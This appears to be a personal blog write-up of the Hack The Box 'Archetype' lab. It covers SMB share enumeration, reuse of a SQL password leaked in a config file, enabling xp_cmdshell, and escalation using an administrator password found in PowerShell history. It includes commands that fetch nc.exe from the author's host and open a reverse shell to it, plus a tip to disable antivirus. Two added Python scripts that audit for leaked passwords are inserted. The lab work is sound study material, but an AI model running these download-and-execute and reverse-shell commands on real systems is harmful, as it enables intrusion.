Box 1: HTB - Archetype
Normally, I use Nmap to begin port scanning and reconnaissance. For an explanation of nmap syntax and its parameters, visit this site: https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.27 --open
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
Oh, let me check what we found:
- 5985 & 47001 are HTTP ports, but they are served by the Microsoft HTTP API (5985 is the WinRM HTTP listener), not a web application. I tried accessing them in a browser without success, and web directory enumeration with dirsearch and dirb also turned up nothing.
- The dynamic ports (49664–49669) are high port numbers; I was going to ignore them, but still looked for clues. What I found: many services rely on the Remote Procedure Call (RPC) or DCOM features in Microsoft Windows to have dynamic TCP ports assigned to them. Specifically, these are local ports used by Task Scheduler, Spooler, Eventlog, Skype and similar services. You can’t disable them unless you stop the processes listening on them. Check this.
Nevertheless, I identified the ports I thought were interesting: 139, 445 and 1433.
- Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
- Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the Internet.
- Port 1433: Microsoft’s SQL Server, including the desktop editions that are often silently installed with other Microsoft applications, opens and services queries delivered over incoming TCP connections through this port.
Next, it is worth checking whether anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list the available shares, trying no username and no password, with these options:
-L to get a list of the shares available on a host
-N (the same as --no-pass) to ask for no password
smbclient -L -N //10.10.10.27
Great, there are two available shares with read access:
- IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
- backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.
As usual, “backups” is an interesting folder to start with, so let’s attempt to access it and see what’s inside, using the command below:
smbclient -N //10.10.10.27/backups
Use help to list all the commands we can use here. Then use dir to list everything contained in the share. Yup, this directory contains an interesting file called “prod.dtsConfig”. You can’t use type here to view the content of this file, so I used the get <file name> command to download the file to my local machine, which I could then open using
Haha, two helpful pieces of information were a User ID and a Password, and I’m sure you agree they’re used to access the MS SQL service. Now we need a SQL client tool to access the database, such as SSMS on Windows machines, though I’m using Kali.
After searching on Google, many pentesters recommend a script called “mssqlclient.py” from the Impacket tool suite, which is installed on Kali. First, move to the directory of the Impacket tools. After that, use the script to log in to the MS SQL database:
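This is the defender-side lesson of the backups share: an SSIS package configuration (.dtsConfig) that embeds a SQL login in its connection string. The following Python audit, an added example that is not part of the original post, parses a .dtsConfig file and reports every connection string that carries a plaintext password without echoing the secret; the sample file and the password in it are constructed.

```python
# Added example: audit SSIS .dtsConfig files for connection strings that
# embed a password. The sample below is constructed (made-up password) and
# mirrors the layout SSIS uses for package configuration files.
import re
import xml.etree.ElementTree as ET

SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="EXAMPLE\\builder" GeneratedFromPackageName="Package"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" ValueType="String"
    Path="\\Package.Connections[Destination].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;User ID=ARCHETYPE\\sql_svc;Password=Example-Pa55w0rd;Initial Catalog=Catalog;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" ValueType="String"
    Path="\\Package.Connections[Source].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Keys that carry a password / user in OLE DB and SQL Server connection strings.
PASSWORD_KEY_RE = re.compile(r"(?:^|;)\s*(?:password|pwd)\s*=\s*(?P<value>[^;]*)", re.IGNORECASE)
USER_KEY_RE = re.compile(r"(?:^|;)\s*(?:user id|uid)\s*=\s*(?P<value>[^;]*)", re.IGNORECASE)


def find_embedded_passwords(xml_text):
    """Return (property path, user id, password length) for each ConfiguredValue
    whose connection string carries a non-empty password. The secret itself is
    never returned, so the report can be shared safely. Strings that use
    Integrated Security (Windows auth) carry no password and are not reported."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pw = PASSWORD_KEY_RE.search(value_el.text)
        if pw is None or not pw.group("value").strip():
            continue
        user = USER_KEY_RE.search(value_el.text)
        findings.append((conf.get("Path"),
                         user.group("value").strip() if user else None,
                         len(pw.group("value").strip())))
    return findings


def audit_file(path):
    """Run the check over a .dtsConfig file on disk (utf-8-sig strips a BOM)."""
    with open(path, encoding="utf-8-sig") as fh:
        return find_embedded_passwords(fh.read())
```

Any non-empty result means the package should be moved to a SQL login stored outside the file (SSIS package protection level or Windows authentication) and the share's read permissions tightened.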
python3 mssqlclient.py ARCHETYPEfirstname.lastname@example.org -windows-auth
-h | --help : Show usage and all optional arguments
-windows-auth : whether or not to use Windows Authentication (default False)
After a successful login, we can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. Syntax: SELECT IS_SRVROLEMEMBER('sysadmin')
The result returned is 1, which indicates that we have the sysadmin role. This will allow us to enable xp_cmdshell and gain RCE on the host. Run help to show what we can do here.
As you can see, we can use enable_xp_cmdshell to enable xp_cmdshell and go ahead. Alternatively, there is another way to do this; let’s try it by entering the commands below:
SQL> EXEC sp_configure 'show advanced options', 1
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> xp_cmdshell "whoami"
Great, so we now know that we are a sysadmin and that we can execute commands. The next thing I did was try to spawn a reverse-shell connection to my Kali machine. After a bit of research, I found out that one way to get the reverse shell is to host a file containing the reverse shell program somewhere on my Kali, then have the SQL server connect to my Kali machine, download that file and execute it.
I decided to use a familiar tool to connect the SQL server back to my Kali: Netcat. So turn off your anti-virus software temporarily and download it here.
Let’s host this nc.exe somewhere on your Kali. Next, change to the directory containing nc.exe and set up a web server to serve this file on port 80 (HTTP):
python -m SimpleHTTPServer 80
Back on the SQL server, try this command to download nc.exe from my Kali web server. Note that 10.10.14.113 is my Kali IP address.
xp_cmdshell "powershell wget http://10.10.14.113:80/nc.exe"
If that fails, try again with the options below, remembering to define an output path so the file is easy to locate later:
xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.113:80/nc.exe -OutFile %temp%/nc.exe"
Note: here, %temp% expands to C:\Users\sql_svc\AppData\Local\Temp, so the file lands at C:\Users\sql_svc\AppData\Local\Temp\nc.exe
After that, in another window, spawn a Netcat listener on port 443:
nc -lvnp 443
Finally, launch our executable “nc.exe”, which will connect back to our Netcat listener. For more about Netcat syntax, please check this.
xp_cmdshell "%temp%/nc.exe -nv 10.10.14.113 443 -e cmd.exe"
We now have a command shell on the SQL server, received as the sql_svc account. Check this user’s Desktop and you will see user.txt, which contains the flag.
Well, now that we have the user’s flag, we need to get the administrator flag too. There was only one problem: I had no idea where to go next, so I had to research Windows privilege escalation techniques. Here I stumbled upon a very helpful checklist.
The systeminfo command didn’t help much apart from identifying the OS version as “Microsoft Windows Server 2019 Standard”.
Next, following the checklist, I checked the environment variables with the SET command, but nothing new or interesting was found.
PowerShell history was next on the checklist. I first needed to find the path where it is stored, and after some quick Googling I found a useful article. The location of the file can be identified by running the Get-PSReadlineOption command and looking at the HistorySavePath key.
The located path is:
Let’s check what the “net.exe use” command does by looking at the documentation. The net use command is a Command Prompt command used to connect to, remove, and configure connections to shared resources, like mapping drives and network printers. So this command maps the \\Archetype\backups shared resource to a new drive called “T:” with the credentials needed to connect to it -
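The root of this escalation is an administrator password typed inline into a net use command and preserved in the PSReadLine history file (by default %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt). The Python check below, an added example that is not part of the original post, scans such a history file and reports every net use line that carries a literal password, while treating the safe “*” form (which prompts for the password instead) as clean; the sample history and password are constructed.

```python
# Added example: flag 'net use' commands in a PSReadLine history file that
# carry an inline password. Sample history and password are constructed.
import re

SAMPLE_HISTORY = """Get-ChildItem C:\\backups
net.exe use T: \\\\Archetype\\backups /user:administrator Example-Pa55w0rd
net use Z: \\\\fileserver\\share /user:svc_backup *
exit
"""

# net[.exe] use <drive> \\server\share [password | *] [/user:name] ...
NET_USE_RE = re.compile(
    r"^\s*net(?:\.exe)?\s+use\s+(?P<drive>\S+)\s+(?P<share>\\\\\S+)(?P<rest>.*)$",
    re.IGNORECASE)


def find_inline_credentials(history_text):
    """Return one dict per history line that maps a share with a literal password.
    Only the password length is reported, never the password itself."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        m = NET_USE_RE.match(line)
        if not m:
            continue
        tokens = m.group("rest").split()
        user = next((t[len("/user:"):] for t in tokens if t.lower().startswith("/user:")), None)
        password = None
        # Form 1: the password directly follows the share, before any /option.
        if tokens and not tokens[0].startswith("/"):
            password = tokens[0]
        # Form 2: the password directly follows /user:name.
        for i, t in enumerate(tokens[:-1]):
            if t.lower().startswith("/user:") and not tokens[i + 1].startswith("/"):
                password = tokens[i + 1]
        # A bare '*' makes net use prompt for the password, so nothing is stored.
        if password is None or password == "*":
            continue
        findings.append({"line": lineno, "drive": m.group("drive"),
                         "share": m.group("share"), "user": user,
                         "password_length": len(password)})
    return findings


def scan_history_file(path):
    """Run the check over a ConsoleHost_history.txt file on disk."""
    with open(path, encoding="utf-8-sig", errors="replace") as fh:
        return find_inline_credentials(fh.read())
```

A hit means the credential should be rotated and the history line purged; leaving the password out of the command line (prompted form) avoids the leak in the first place.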
Now we need to find a way to connect to the machine as that user, with something similar to SSH. Here is a list of tools I found that could help with the situation. The next tool in line was the psexec.py script from the Impacket library. Documentation about the original PsExec from Sysinternals can be found here. This tool allows us to connect to a remote Windows host, and by combining it with the credentials we gathered, we can connect to the host and gain admin access.
After gaining admin access, we simply traverse to the Administrator’s desktop and read the root flag (I won’t disclose it).
Finally, this is my first story on Medium, and also the first box on my journey toward the OSCP exam. I’ll try to add more details when possible.
THANKS FOR READING AND SUPPORTING!